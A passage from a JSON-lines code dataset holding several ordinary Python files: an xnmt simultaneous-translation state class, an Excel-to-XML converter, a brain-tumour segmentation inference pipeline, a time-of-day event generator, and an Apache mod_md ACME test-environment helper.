{data}\".format(data=kwargs.keys()))\n","sub_path":"libapp/notifications/sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"415630599","text":"__author__ = 'philipp.atorf'\nimport numpy as np\n\n\nclass cam_point_connection:\n    \"\"\"\n\n    :param camID:\n    :param pointID:\n    :param pos:\n    \"\"\"\n\n    def __init__(self, camID, pointID, pos=np.zeros([2, 1])):\n        self.cam = camID\n        \"\"\":type: int\"\"\"\n        self.point_intern = pointID\n        \"\"\":type: int\"\"\"\n        self.pos = pos\n        \"\"\":type: ndarray\"\"\"\n        self.point_global = None\n        \"\"\":type: int\"\"\"","sub_path":"cam_point_connection.py","file_name":"cam_point_connection.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"53623342","text":"import dynet as dy\nimport numbers\n\nimport xnmt.transducers.base as transducers_base\nimport xnmt.modelparts.decoders as decoders\nimport xnmt.transducers.recurrent as 
recurrent\nimport xnmt.expression_seqs as expr_seq\nimport xnmt.vocabs as vocabs\n\nfrom xnmt.rl.policy_action import PolicyAction\n\nclass SimultaneousState(decoders.AutoRegressiveDecoderState):\n \"\"\"\n The read/write state used to determine the state of the SimultaneousTranslator.\n \"\"\"\n def __init__(self,\n model,\n encoder_state: recurrent.UniLSTMState,\n decoder_state: decoders.AutoRegressiveDecoderState,\n has_been_read:int = 0,\n has_been_written:int = 0,\n written_word: numbers.Integral = None,\n policy_action: PolicyAction=None,\n reset_attender:bool = True,\n parent: 'SimultaneousState' = None):\n super().__init__(None, None)\n self.model = model\n self.encoder_state = encoder_state\n self.decoder_state = decoder_state\n self.has_been_read = has_been_read\n self.has_been_written = has_been_written\n self.written_word = written_word\n self.policy_action = policy_action\n self.reset_attender = reset_attender\n self.cache = {}\n self.parent = parent\n\n def read(self, src_encoding, policy_action):\n return SimultaneousState(self.model, src_encoding, self.decoder_state,\n has_been_read=self.has_been_read+1, has_been_written=self.has_been_written,\n written_word=self.written_word, policy_action=policy_action, reset_attender=True,\n parent=self)\n\n def write(self, src_encoding, word, policy_action):\n # Reset attender if there is a read action\n reset_attender = self.reset_attender\n if reset_attender:\n encodings = src_encoding[:self.has_been_read]\n self.model.attender.init_sent(expr_seq.ExpressionSequence(expr_list=encodings))\n reset_attender = False\n\n # Generating h_t based on RNN(h_{t-1}, embed(e_{t-1}))\n if self.decoder_state is None or word is None:\n dim = src_encoding[0].dim()\n fin_tran_state = [transducers_base.FinalTransducerState(dy.zeros(*dim), dy.zeros(*dim))]\n decoder_state = self.model.decoder.initial_state(fin_tran_state, vocabs.Vocab.SS)\n else:\n decoder_state = self.model.decoder.add_input(self.decoder_state, word)\n decoder_state.attention = self.model.attender.calc_attention(decoder_state.as_vector())\n decoder_state.context = self.model.attender.calc_context(decoder_state.as_vector(), decoder_state.attention)\n\n # Calc context for decoding\n return SimultaneousState(self.model, self.encoder_state, decoder_state,\n has_been_read=self.has_been_read, has_been_written=self.has_been_written+1,\n written_word=word, policy_action=policy_action, reset_attender=reset_attender,\n parent=self)\n\n def find_backward(self, field) -> list:\n now = self\n results = []\n while now.parent is not None:\n if field in now.cache:\n if len(results) == 0:\n results = now.cache[field]\n else:\n results.extend(now.cache[field])\n break\n else:\n result = getattr(now, field)\n if result is not None:\n results.append(result)\n now = now.parent\n self.cache[field] = results\n return self.cache[field]\n\n # These states are used for decoding\n @property\n def rnn_state(self):\n return self.decoder_state.rnn_state\n\n @property\n def context(self):\n return self.decoder_state.context\n\n def __repr__(self):\n content = self.policy_action.content if self.policy_action is not None else None\n return \"({}, {}, {})\".format(content, self.has_been_read, self.has_been_written)\n\n","sub_path":"xnmt/simultaneous/simult_state.py","file_name":"simult_state.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"78273991","text":"from xml.etree import ElementTree as ET\nimport json\nimport 
xlrd\n\n\ndef read_excel(excel_name):\n    excel = xlrd.open_workbook(excel_name)\n    excel_sheet = excel.sheet_by_name('student')\n    data = {}\n    for i in range(excel_sheet.nrows):\n        data[(excel_sheet.row_values(i))[0]] = excel_sheet.row_values(i)[1:]\n\n    return json.dumps(data, ensure_ascii=False)\n\n\ndef write_xml(data, xml_name):\n    root = ET.Element('root')\n    students = ET.SubElement(root, 'students')\n    students.text = data\n    students.append(ET.Comment(u\"\"\"学生信息表\"id\": [名字,数学,语文,英文]\"\"\"))\n\n    students_xml = ET.ElementTree(root)\n    students_xml.write(xml_name, xml_declaration=True, encoding='utf-8')\n\n\ncontent = read_excel('students.xls')\nwrite_xml(content, 'students.xml')\n","sub_path":"017/017.py","file_name":"017.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"157026801","text":"import tensorflow as tf\nimport numpy as np\nimport SimpleITK as sitk\nimport os\nimport imageio  # used by make_gif below\n\nfrom .conv_blocks import *\nfrom .losses import *\nfrom .utils import *\n\nfrom tensorflow.keras.mixed_precision import experimental as mixed_precision\npolicy = mixed_precision.Policy('mixed_float16')\nmixed_precision.set_policy(policy)\n\ndepth = 128 # 155\nheight = 192 # 240\nwidth = 160 # 240\nchannel_names = ['_t1.', '_t2.', '_t1ce.', '_flair.'] # do not change order\n# T1-weighted (T1), post-contrast T1-weighted (T1ce), T2-weighted (T2), and T2 Fluid Attenuated Inversion Recovery (FLAIR)\nout_channels = ['empty', 'ncr', 'ed', 'et']\n# necrotic and non-enhancing tumor core (NCR), peritumoral edema (ED), GD-enhancing tumor(ET)\n\n# ET : available\n# TC : ET + NCR\n# WT : ET + NCR + ED\n\n# model.save(\"model-best.h5\", include_optimizer=False)\n\nmodel = tf.keras.models.load_model(\"model-best.h5\", custom_objects={'ConvNorm': ConvNorm,\n                                                                    'NormAct': NormAct,\n                                                                    'AttnBottleneckBlock': AttnBottleneckBlock,\n                                                                    'BasicBlock': BasicBlock,\n                                                                    'InvertedResBlock': InvertedResBlock,\n                                                                    'SqueezeExcite': SqueezeExcite,\n                                                                    'MHSA3D': MHSA3D,\n                                                                    'AbsPosEmb': AbsPosEmb,\n                                                                    'dsc': dsc,\n                                                                    'FocalTversky': FocalTversky,\n                                                                    'CustomCLR': CustomCLR,\n                                                                    }, compile=False)\n\ndef sort_path_list(path_list):\n    ret = []\n    for cnl in channel_names:\n        for p in path_list:\n            if cnl in os.path.split(p)[-1]:\n                ret.append(p)\n                path_list.remove(p)\n                break\n        else:\n            print(f\"[!] 
Channel {cnl} not found.\")\n    return ret\n\ndef read_img(path):\n    img = sitk.GetArrayFromImage(sitk.ReadImage(path))\n    img = tf.convert_to_tensor(img, dtype=tf.float32)\n    scale = tf.reduce_max(img)/2\n    img = (img/scale) - 1 # -1 to 1\n    return tf.cast(img, tf.float32)\n\ndef load_img(path_list):\n    assert len(path_list)==4, f\"There must be 4 channel paths, got {len(path_list)} instead.\"\n    path_list = sort_path_list(path_list)\n    img = tf.stack([read_img(path) for path in path_list])\n    return img # [C, D, H, W]\n\ndef final_augmentation(imgs): # input imgs[B, 4, 155, 240, 240], output[B, 4, 128, 192, 160]\n    imgs = center_crop3D(imgs)\n    # imgs = tf.image.per_image_standardization(imgs) # source code checked, it's fine for 3D\n    # imgs = (imgs - mean) / std\n    return imgs\n\ndef center_crop3D(imgs, train=True): # Crops image to size (128, 192, 160)\n    d_cr, h_cr, w_cr = 13, 24, 40\n    imgs = imgs[:, :, d_cr:d_cr+depth, h_cr:h_cr+height, w_cr:w_cr+width]\n    return imgs\n\ndef make_gif(img, pred, fname, alpha = 0.5): # [C, D, H, W]\n    img = img * alpha\n    img = np.stack((img,)*3, axis=-1)\n    pred = pred.transpose(1,2,3,0) # [D, H, W, C]\n    with imageio.get_writer(fname, mode='I', fps=10) as writer:\n        p_images = (img + pred*(1-alpha)).astype(np.uint8)\n        for i in p_images:\n            writer.append_data(i)\n\ndef process_pipeline(paths, fname=\"out.gif\"):\n    imgs = load_img(paths.copy())[None,:] # add batch dimension\n    imgs = final_augmentation(imgs)\n    preds = model(imgs)[0,1:].numpy()\n    img = imgs[0,1].numpy()\n    mn = img.min()\n    mx = img.max()\n    img = (img - mn)/(mx - mn) * 255\n    make_gif(img, preds*255, fname=fname)","sub_path":"model/backend_brain_pipeline.py","file_name":"backend_brain_pipeline.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"365931604","text":"import time\nimport event_support.white_board\nfrom event import Event\n# for each new time period set a new value\nTOY_CASE_SPEED_UP = 3600\nUPDATE_TIME = 100\nprevious_ct_val = None\nEVENT_NAME_TIME_DAY = \"part_day\"\n\n\ndef get_time_from_midnight(moment):\n    # 'moment' is expected to be a datetime; subtract its midnight to get seconds since midnight\n    midnight = moment.replace(hour=0, minute=0, second=0, microsecond=0)\n    return (moment - midnight).total_seconds()\n\n\ndef convert_to_ct_val(kelvin):\n    return -kelvin * 0.05425 + 505.625\n\n\nnormal_case = {\n    0: convert_to_ct_val(2700),\n    8 * 3600: convert_to_ct_val(4000),\n    10 * 3600: convert_to_ct_val(6500),\n    16 * 3600: convert_to_ct_val(4000),\n    18 * 3600: convert_to_ct_val(2700)\n}\n\n\ndef find_range(array, value):\n    # return the consecutive pair (prev, next) that brackets value, or None\n    prev_val = array[0]\n    for i in range(1, len(array)):\n        if prev_val <= value < array[i]:\n            return prev_val, array[i]\n        prev_val = array[i]\n\n\nclass TimeOfTheDayEventGenerator:\n    def __init__(self):\n        self._previous_max_range = 0\n\n    def on_timer(self, timestamp):\n        # bracket the current time of day between the configured period boundaries\n        rng = find_range(sorted(normal_case), get_time_from_midnight(timestamp))\n        if rng is None:\n            return\n        (time1, time2) = rng\n        if time1 <= self._previous_max_range:\n            return\n        self._previous_max_range = time2\n\n        event_support.white_board.add_event(Event(EVENT_NAME_TIME_DAY), [])\n","sub_path":"event_support/time_of_day_event.py","file_name":"time_of_day_event.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"458214806","text":"# test mod_md acme terms-of-service handling\n\nimport copy\nimport json\nimport pytest\nimport re\nimport os\nimport shutil\nimport socket\nimport subprocess\nimport sys\nimport time\nimport OpenSSL\n\nfrom datetime import datetime\nfrom datetime import tzinfo\nfrom datetime import timedelta\nfrom 
configparser import SafeConfigParser\nfrom shutil import copyfile\nfrom http.client import HTTPConnection\nfrom urllib.parse import urlparse\n\nSEC_PER_DAY = 24 * 60 * 60\n\nclass TestEnv:\n\n @classmethod\n def _init_base( cls ) :\n cls.ACME_URL = None\n cls.STORE_DIR = None\n\n cls.config = SafeConfigParser()\n cls.config.read('test.ini')\n cls.PREFIX = cls.config.get('global', 'prefix')\n\n cls.GEN_DIR = cls.config.get('global', 'gen_dir')\n\n cls.WEBROOT = cls.config.get('global', 'server_dir')\n cls.HOSTNAME = cls.config.get('global', 'server_name')\n cls.TESTROOT = os.path.join(cls.WEBROOT, '..', '..')\n \n cls.APACHECTL = os.path.join(cls.PREFIX, 'bin', 'apachectl')\n cls.APXS = os.path.join(cls.PREFIX, 'bin', 'apxs')\n cls.ERROR_LOG = os.path.join(cls.WEBROOT, \"logs\", \"error_log\")\n cls.APACHE_CONF_DIR = os.path.join(cls.WEBROOT, \"conf\")\n cls.APACHE_SSL_DIR = os.path.join(cls.APACHE_CONF_DIR, \"ssl\")\n cls.APACHE_CONF = os.path.join(cls.APACHE_CONF_DIR, \"httpd.conf\")\n cls.APACHE_TEST_CONF = os.path.join(cls.APACHE_CONF_DIR, \"test.conf\")\n cls.APACHE_CONF_SRC = \"data\"\n cls.APACHE_HTDOCS_DIR = os.path.join(cls.WEBROOT, \"htdocs\")\n\n cls.HTTP_PORT = cls.config.get('global', 'http_port')\n cls.HTTPS_PORT = cls.config.get('global', 'https_port')\n cls.HTTP_PROXY_PORT = cls.config.get('global', 'http_proxy_port')\n cls.HTTPD_HOST = \"localhost\"\n cls.HTTPD_URL = \"http://\" + cls.HTTPD_HOST + \":\" + cls.HTTP_PORT\n cls.HTTPD_URL_SSL = \"https://\" + cls.HTTPD_HOST + \":\" + cls.HTTPS_PORT\n cls.HTTPD_PROXY_URL = \"http://\" + cls.HTTPD_HOST + \":\" + cls.HTTP_PROXY_PORT\n cls.HTTPD_CHECK_URL = cls.HTTPD_PROXY_URL \n\n cls.A2MD = cls.config.get('global', 'a2md_bin')\n cls.CURL = cls.config.get('global', 'curl_bin')\n cls.OPENSSL = cls.config.get('global', 'openssl_bin')\n\n cls.MD_S_UNKNOWN = 0\n cls.MD_S_INCOMPLETE = 1\n cls.MD_S_COMPLETE = 2\n cls.MD_S_EXPIRED = 3\n cls.MD_S_ERROR = 4\n\n cls.EMPTY_JOUT = { 'status' : 0, 'output' : [] }\n\n cls.ACME_SERVER_DOWN = False\n cls.ACME_SERVER_OK = False\n\n cls.DOMAIN_SUFFIX = \"%d.org\" % time.time()\n\n cls.set_store_dir_default()\n cls.set_acme('acmev2')\n cls.clear_store()\n cls.install_test_conf()\n\n @classmethod\n def set_acme( cls, acme_section ) :\n cls.ACME_URL_DEFAULT = cls.config.get(acme_section, 'url_default')\n cls.ACME_URL = cls.config.get(acme_section, 'url')\n cls.ACME_TOS = cls.config.get(acme_section, 'tos')\n cls.ACME_TOS2 = cls.config.get(acme_section, 'tos2')\n cls.BOULDER_DIR = cls.config.get(acme_section, 'boulder_dir')\n if cls.STORE_DIR:\n cls.a2md_stdargs([cls.A2MD, \"-a\", cls.ACME_URL, \"-d\", cls.STORE_DIR, \"-j\" ])\n cls.a2md_rawargs([cls.A2MD, \"-a\", cls.ACME_URL, \"-d\", cls.STORE_DIR ])\n\n @classmethod\n def init( cls ) :\n cls._init_base()\n\n @classmethod\n def initv1( cls ) :\n cls._init_base()\n cls.set_acme('acmev1')\n\n @classmethod\n def initv2( cls ) :\n cls._init_base()\n\n @classmethod\n def set_store_dir( cls, dir ) :\n cls.STORE_DIR = os.path.join(cls.WEBROOT, dir)\n if cls.ACME_URL:\n cls.a2md_stdargs([cls.A2MD, \"-a\", cls.ACME_URL, \"-d\", cls.STORE_DIR, \"-j\" ])\n cls.a2md_rawargs([cls.A2MD, \"-a\", cls.ACME_URL, \"-d\", cls.STORE_DIR ])\n\n @classmethod\n def set_store_dir_default( cls ) :\n dir = \"md\"\n if cls.httpd_is_at_least(\"2.5.0\"):\n dir = os.path.join(\"state\", dir)\n cls.set_store_dir(dir)\n\n @classmethod\n def get_method_domain( cls, method ) :\n return \"%s-%s\" % (re.sub(r'[_]', '-', method.__name__.lower()), TestEnv.DOMAIN_SUFFIX)\n\n @classmethod\n 
def get_module_domain( cls, module ) :\n return \"%s-%s\" % (re.sub(r'[_]', '-', module.__name__.lower()), TestEnv.DOMAIN_SUFFIX)\n\n @classmethod\n def get_class_domain( cls, c ) :\n return \"%s-%s\" % (re.sub(r'[_]', '-', c.__name__.lower()), TestEnv.DOMAIN_SUFFIX)\n\n # --------- cmd execution ---------\n\n _a2md_args = []\n _a2md_args_raw = []\n \n @classmethod\n def run( cls, args, input=None ) :\n p = subprocess.run(args, capture_output=True, text=True)\n try:\n jout = json.loads(p.stdout)\n except:\n jout = None\n print(\"stderr: \", p.stderr)\n print(\"stdout: \", p.stdout)\n return { \n \"rv\": p.returncode, \n \"stdout\": p.stdout, \n \"stderr\": p.stderr,\n \"jout\" : jout \n }\n\n @classmethod\n def a2md_stdargs( cls, args ) :\n cls._a2md_args = [] + args \n\n @classmethod\n def a2md_rawargs( cls, args ) :\n cls._a2md_args_raw = [] + args\n \n @classmethod\n def a2md( cls, args, raw=False ) :\n preargs = cls._a2md_args\n if raw :\n preargs = cls._a2md_args_raw\n return cls.run( preargs + args )\n\n @classmethod\n def curl( cls, args ) :\n return cls.run( [ cls.CURL ] + args )\n\n # --------- HTTP ---------\n\n @classmethod\n def is_live( cls, url, timeout ) :\n server = urlparse(url)\n try_until = time.time() + timeout\n print(\"checking reachability of %s\" % url)\n while time.time() < try_until:\n try:\n c = HTTPConnection(server.hostname, server.port, timeout=timeout)\n c.request('HEAD', server.path)\n resp = c.getresponse()\n c.close()\n return True\n except ConnectionRefusedError:\n print(\"connection refused\")\n time.sleep(.1)\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n time.sleep(.1)\n print(\"Unable to contact server after %d sec\" % timeout)\n return False\n\n @classmethod\n def is_dead( cls, url, timeout ) :\n server = urlparse(url)\n try_until = time.time() + timeout\n print(\"checking reachability of %s\" % url)\n while time.time() < try_until:\n try:\n c = HTTPConnection(server.hostname, server.port, timeout=timeout)\n c.request('HEAD', server.path)\n resp = c.getresponse()\n c.close()\n time.sleep(.1)\n except IOError:\n return True\n except:\n return True\n print(\"Server still responding after %d sec\" % timeout)\n return False\n\n @classmethod\n def get_json( cls, url, timeout ) :\n data = cls.get_plain( url, timeout )\n if data:\n return json.loads(data)\n return None\n\n @classmethod\n def get_plain( cls, url, timeout ) :\n server = urlparse(url)\n try_until = time.time() + timeout\n while time.time() < try_until:\n try:\n c = HTTPConnection(server.hostname, server.port, timeout=timeout)\n c.request('GET', server.path)\n resp = c.getresponse()\n data = resp.read()\n c.close()\n return data\n except IOError:\n print(\"connect error:\", sys.exc_info()[0])\n time.sleep(.1)\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n print(\"Unable to contact server after %d sec\" % timeout)\n return None\n\n @classmethod\n def check_acme( cls ) :\n if cls.ACME_SERVER_OK:\n return True\n if cls.ACME_SERVER_DOWN:\n pytest.skip(msg=\"ACME server not running\")\n return False\n if cls.is_live(cls.ACME_URL, 0.5):\n cls.ACME_SERVER_OK = True\n return True\n else:\n cls.ACME_SERVER_DOWN = True\n pytest.fail(msg=\"ACME server not running\", pytrace=False)\n return False\n\n @classmethod\n def get_httpd_version( cls ) :\n p = subprocess.run([ cls.APXS, \"-q\", \"HTTPD_VERSION\" ], capture_output=True, text=True)\n if p.returncode != 0:\n return \"unknown\"\n return p.stdout.strip()\n \n @classmethod\n def _versiontuple( cls, v ):\n return 
tuple(map(int, v.split('.')))\n    \n    @classmethod\n    def httpd_is_at_least( cls, minv ) :\n        hv = cls._versiontuple(cls.get_httpd_version())\n        return hv >= cls._versiontuple(minv)\n\n    # --------- access local store ---------\n\n    @classmethod\n    def purge_store( cls ) : \n        print(\"purge store dir: %s\" % TestEnv.STORE_DIR)\n        assert len(TestEnv.STORE_DIR) > 1\n        if os.path.exists(TestEnv.STORE_DIR):\n            shutil.rmtree(TestEnv.STORE_DIR, ignore_errors=False)\n        os.makedirs(TestEnv.STORE_DIR)\n\n    @classmethod\n    def clear_store( cls ) : \n        print(\"clear store dir: %s\" % TestEnv.STORE_DIR)\n        assert len(TestEnv.STORE_DIR) > 1\n        if not os.path.exists(TestEnv.STORE_DIR):\n            os.makedirs(TestEnv.STORE_DIR)\n        for dir in [ \"challenges\", \"tmp\", \"archive\", \"domains\", \"accounts\", \"staging\", \"ocsp\" ]:\n            shutil.rmtree(os.path.join(TestEnv.STORE_DIR, dir), ignore_errors=True)\n\n    @classmethod\n    def clear_ocsp_store( cls ) : \n        assert len(TestEnv.STORE_DIR) > 1\n        dir = os.path.join(TestEnv.STORE_DIR, \"ocsp\")\n        print(\"clear ocsp store dir: %s\" % dir)\n        if os.path.exists(dir):\n            shutil.rmtree(dir, ignore_errors=True)\n\n    @classmethod\n    def authz_save( cls, name, content ) :\n        dir = os.path.join(TestEnv.STORE_DIR, 'staging', name)\n        os.makedirs(dir)\n        open( os.path.join( dir, 'authz.json'), \"w\" ).write(content)\n\n    @classmethod\n    def path_store_json( cls ) : \n        return os.path.join(TestEnv.STORE_DIR, 'md_store.json')\n\n    @classmethod\n    def path_account( cls, acct ) : \n        return os.path.join(TestEnv.STORE_DIR, 'accounts', acct, 'account.json')\n\n    @classmethod\n    def path_account_key( cls, acct ) : \n        return os.path.join(TestEnv.STORE_DIR, 'accounts', acct, 'account.pem')\n\n    @classmethod\n    def store_domains( cls ) :\n        return os.path.join(TestEnv.STORE_DIR, 'domains')\n\n    @classmethod\n    def store_archives( cls ) :\n        return os.path.join(TestEnv.STORE_DIR, 'archive')\n\n    @classmethod\n    def store_stagings( cls ) :\n        return os.path.join(TestEnv.STORE_DIR, 'staging')\n\n    @classmethod\n    def store_challenges( cls ) :\n        return os.path.join(TestEnv.STORE_DIR, 'challenges')\n    \n    @classmethod\n    def store_domain_file( cls, domain, filename ) :\n        return os.path.join(TestEnv.store_domains(), domain, filename)\n\n    @classmethod\n    def store_archived_file( cls, domain, version, filename ) :\n        return os.path.join(TestEnv.store_archives(), \"%s.%d\" % (domain, version), filename)\n    \n    @classmethod\n    def store_staged_file( cls, domain, filename ) :\n        return os.path.join(TestEnv.store_stagings(), domain, filename)\n    \n    @classmethod\n    def path_fallback_cert( cls, domain ) :\n        return os.path.join(TestEnv.STORE_DIR, 'domains', domain, 'fallback-cert.pem')\n\n    @classmethod\n    def path_job( cls, domain ) :\n        return os.path.join( TestEnv.STORE_DIR, 'staging', domain, 'job.json' )\n\n    @classmethod\n    def replace_store( cls, src):\n        shutil.rmtree(TestEnv.STORE_DIR, ignore_errors=False)\n        shutil.copytree(src, TestEnv.STORE_DIR)\n\n    @classmethod\n    def list_accounts( cls ) :\n        return os.listdir( os.path.join( TestEnv.STORE_DIR, 'accounts' ) )\n    \n    @classmethod\n    def check_md(cls, domain, md=None, state=-1, ca=None, protocol=None, agreement=None, contacts=None):\n        # 'domains' must be bound even when a single domain name is passed\n        domains = None\n        if isinstance(domain, list):\n            domains = domain\n            domain = domains[0]\n        if md:\n            domain = md\n        path = cls.store_domain_file(domain, 'md.json')\n        with open( path ) as f:\n            md = json.load(f)\n        assert md\n        if domains:\n            assert md['domains'] == domains\n        if state >= 0:\n            assert md['state'] == state\n        if ca:\n            assert md['ca']['url'] == ca\n        if protocol:\n            assert md['ca']['proto'] == 
protocol\n        if agreement:\n            assert md['ca']['agreement'] == agreement\n        if contacts:\n            assert md['contacts'] == contacts\n\n\n    @classmethod\n    def check_md_complete(cls, domain):\n        md = cls.get_md_status(domain)\n        assert md\n        assert md['state'] == TestEnv.MD_S_COMPLETE\n        assert os.path.isfile( TestEnv.store_domain_file(domain, 'privkey.pem') )\n        assert os.path.isfile( TestEnv.store_domain_file(domain, 'pubcert.pem') )\n\n    @classmethod\n    def check_md_credentials(cls, domain):\n        if isinstance(domain, list):\n            domains = domain\n            domain = domains[0]\n        else:\n            # a single name still needs a list to compare the SANs against\n            domains = [domain]\n        # check private key, validate certificate, etc\n        CertUtil.validate_privkey( cls.store_domain_file(domain, 'privkey.pem') )\n        cert = CertUtil( cls.store_domain_file(domain, 'pubcert.pem') )\n        cert.validate_cert_matches_priv_key( cls.store_domain_file(domain, 'privkey.pem') )\n        # check SANs and CN\n        assert cert.get_cn() == domain\n        # compare lists twice in opposite directions: SAN may not respect ordering\n        sanList = list(cert.get_san_list())\n        assert len(sanList) == len(domains)\n        assert set(sanList).issubset(domains)\n        assert set(domains).issubset(sanList)\n        # check valid dates interval\n        notBefore = cert.get_not_before()\n        notAfter = cert.get_not_after()\n        assert notBefore < datetime.now(notBefore.tzinfo)\n        assert notAfter > datetime.now(notAfter.tzinfo)\n\n    # --------- control apache ---------\n\n    @classmethod\n    def install_test_conf( cls, conf=None) :\n        root_conf_src = os.path.join(\"conf\", \"httpd.conf\")\n        copyfile(root_conf_src, cls.APACHE_CONF)\n\n        if conf is None:\n            conf_src = os.path.join(\"conf\", \"test.conf\")\n        elif os.path.isabs(conf):\n            conf_src = conf\n        else:\n            conf_src = os.path.join(cls.APACHE_CONF_SRC, conf + \".conf\")\n        copyfile(conf_src, cls.APACHE_TEST_CONF)\n\n    @classmethod\n    def apachectl( cls, cmd, conf=None, check_live=True ) :\n        if conf:\n            cls.install_test_conf(conf)\n        args = [cls.APACHECTL, \"-d\", cls.WEBROOT, \"-k\", cmd]\n        cls.apachectl_stderr = \"\"\n        p = subprocess.run(args, capture_output=True, text=True)\n        cls.apachectl_stderr = p.stderr\n        rv = p.returncode\n        if rv == 0:\n            if check_live:\n                rv = 0 if cls.is_live(cls.HTTPD_CHECK_URL, 10) else -1\n            else:\n                rv = 0 if cls.is_dead(cls.HTTPD_CHECK_URL, 10) else -1\n                print(\"waited for apache.is_dead, rv=%d\" % rv)\n        return rv\n\n    @classmethod\n    def apache_restart( cls ) :\n        return cls.apachectl( \"graceful\" )\n    \n    @classmethod\n    def apache_start( cls ) :\n        return cls.apachectl( \"start\" )\n\n    @classmethod\n    def apache_stop( cls ) :\n        return cls.apachectl( \"stop\", check_live=False )\n\n    @classmethod\n    def apache_fail( cls ) :\n        rv = cls.apachectl( \"graceful\", check_live=False )\n        if rv != 0:\n            print(\"check, if dead: \" + cls.HTTPD_CHECK_URL)\n            return 0 if cls.is_dead(cls.HTTPD_CHECK_URL, 5) else -1\n        return rv\n    \n    @classmethod\n    def httpd_error_log_clear( cls ):\n        cls.apachectl_stderr = \"\"\n        if os.path.isfile(cls.ERROR_LOG):\n            os.remove(cls.ERROR_LOG)\n\n    RE_MD_RESET = re.compile('.*\[md:info\].*initializing\.\.\.')\n    RE_MD_ERROR = re.compile('.*\[md:error\].*')\n    RE_MD_WARN = re.compile('.*\[md:warn\].*')\n\n    @classmethod\n    def httpd_error_log_count( cls ):\n        ecount = 0\n        wcount = 0\n        \n        if os.path.isfile(cls.ERROR_LOG):\n            fin = open(cls.ERROR_LOG)\n            for line in fin:\n                m = cls.RE_MD_ERROR.match(line)\n                if m:\n                    ecount += 1\n                    continue\n                m = cls.RE_MD_WARN.match(line)\n                if m:\n                    wcount += 1\n                    continue\n                m = cls.RE_MD_RESET.match(line)\n                if m:\n                    ecount = 0\n                    wcount = 0\n        return (ecount, wcount)\n\n    @classmethod\n    def httpd_error_log_scan( cls, regex 
):\n if not os.path.isfile(cls.ERROR_LOG):\n return False\n fin = open(cls.ERROR_LOG)\n for line in fin:\n if regex.match(line):\n return True\n return False\n\n\n # --------- check utilities ---------\n\n @classmethod\n def check_json_contains(cls, actual, expected):\n # write all expected key:value bindings to a copy of the actual data ... \n # ... assert it stays unchanged \n testJson = copy.deepcopy(actual)\n testJson.update(expected)\n assert actual == testJson\n\n @classmethod\n def check_file_access(cls, path, expMask):\n actualMask = os.lstat(path).st_mode & 0o777\n assert oct(actualMask) == oct(expMask)\n\n @classmethod\n def check_dir_empty(cls, path):\n assert os.listdir(path) == []\n\n @classmethod\n def getStatus(cls, domain, path, useHTTPS=True):\n result = cls.get_meta(domain, path, useHTTPS)\n return result['http_status']\n\n @classmethod\n def get_cert(cls, domain):\n return CertUtil.load_server_cert(TestEnv.HTTPD_HOST, TestEnv.HTTPS_PORT, domain)\n\n @classmethod\n def get_meta(cls, domain, path, useHTTPS=True):\n schema = \"https\" if useHTTPS else \"http\"\n port = cls.HTTPS_PORT if useHTTPS else cls.HTTP_PORT\n result = TestEnv.curl([ \"-D\", \"-\", \"-k\", \"--resolve\", (\"%s:%s:127.0.0.1\" % (domain, port)), \n (\"%s://%s:%s%s\" % (schema, domain, port, path)) ])\n assert result['rv'] == 0\n # read status\n m = re.match(\"HTTP/\\\\d(\\\\.\\\\d)? +(\\\\d\\\\d\\\\d) .*\", result['stdout'])\n assert m\n result['http_status'] = int(m.group(2))\n # collect response headers\n h = {}\n for m in re.findall(\"^(\\\\S+): (.*)\\n\", result['stdout'], re.M) :\n h[ m[0] ] = m[1]\n result['http_headers'] = h\n return result\n\n @classmethod\n def get_content(cls, domain, path, useHTTPS=True):\n schema = \"https\" if useHTTPS else \"http\"\n port = cls.HTTPS_PORT if useHTTPS else cls.HTTP_PORT\n result = TestEnv.curl([ \"-sk\", \"--resolve\", (\"%s:%s:127.0.0.1\" % (domain, port)), \n (\"%s://%s:%s%s\" % (schema, domain, port, path)) ])\n assert result['rv'] == 0\n return result['stdout']\n\n @classmethod\n def get_json_content(cls, domain, path, useHTTPS=True):\n schema = \"https\" if useHTTPS else \"http\"\n port = cls.HTTPS_PORT if useHTTPS else cls.HTTP_PORT\n result = TestEnv.curl([ \"-k\", \"--resolve\", (\"%s:%s:127.0.0.1\" % (domain, port)), \n (\"%s://%s:%s%s\" % (schema, domain, port, path)) ])\n assert result['rv'] == 0\n return result['jout'] if 'jout' in result else None\n\n @classmethod\n def get_certificate_status(cls, domain, timeout=60):\n stat = TestEnv.get_json_content(domain, \"/.httpd/certificate-status\")\n return stat\n\n @classmethod\n def get_md_status(cls, domain, timeout=60):\n stat = TestEnv.get_json_content(\"localhost\", \"/md-status/%s\" % (domain))\n return stat\n\n @classmethod\n def get_server_status(cls, timeout=60):\n return TestEnv.get_content(\"localhost\", \"/server-status/\")\n\n @classmethod\n def await_completion(cls, names, must_renew=False, restart=True, timeout=60):\n try_until = time.time() + timeout\n renewals = {}\n while len(names) > 0:\n if time.time() >= try_until:\n return False\n for name in names:\n md = TestEnv.get_md_status(name, timeout)\n if md == None:\n print(\"not managed by md: %s\" % (name))\n return False\n\n if 'renewal' in md:\n renewal = md['renewal']\n renewals[name] = True\n if 'finished' in renewal and renewal['finished'] == True:\n if (not must_renew) or (name in renewals):\n names.remove(name) \n \n if len(names) != 0:\n time.sleep(0.1)\n if restart:\n time.sleep(0.1)\n return cls.apache_restart() == 0\n 
